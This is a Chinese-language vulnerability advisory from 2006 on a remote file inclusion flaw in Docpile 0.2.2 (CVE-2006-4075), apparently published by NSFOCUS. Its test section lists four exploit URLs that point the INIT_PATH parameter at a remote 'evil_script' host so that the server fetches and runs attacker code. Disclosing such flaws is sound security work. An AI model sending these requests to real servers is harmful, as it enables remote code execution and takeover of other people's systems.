首页 -> 安全研究

安全研究

安全漏洞
Docpile Init_path参数远程文件包含漏洞

发布日期:2006-08-08
更新日期:2006-08-08

受影响系统:
docpile-we.berlios Docpile 0.2.2
描述:
BUGTRAQ  ID: 19428
CVE(CAN) ID: CVE-2006-4075

docpile:we 在实现上存在远程文件包含漏洞,可发送特制的URL请求到folder.class.php, email.inc.php, document.class.php, auth.inc.php script脚本,使用 'INIT_PATH' 参数指定远程系统内的恶意文件,导致在有漏洞的服务器上执行任意代码。

<*来源:XORON (x0r0n@hotmail.com
  
  链接:http://xforce.iss.net/xforce/xfdb/28273
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/[path]/lib/folder.class.php?INIT_PATH=http://www.example.com/evil_script?
http://www.example.com/[path]/lib/email.inc.php?INIT_PATH=http://www.example.comevil_script?
http://www.example.com/[path]/lib/document.class.php?INIT_PATH=http://www.example.com/evil_script?
http://www.example.com/[path]/lib/auth.inc.php?INIT_PATH=http://www.example.com/evil_script?

建议:
厂商补丁:

docpile-we.berlios
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://docpile-we.berlios.de/index.php?PHPSESSID=31a7fdba86619d34296957b059e55d9a

浏览次数:2376
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障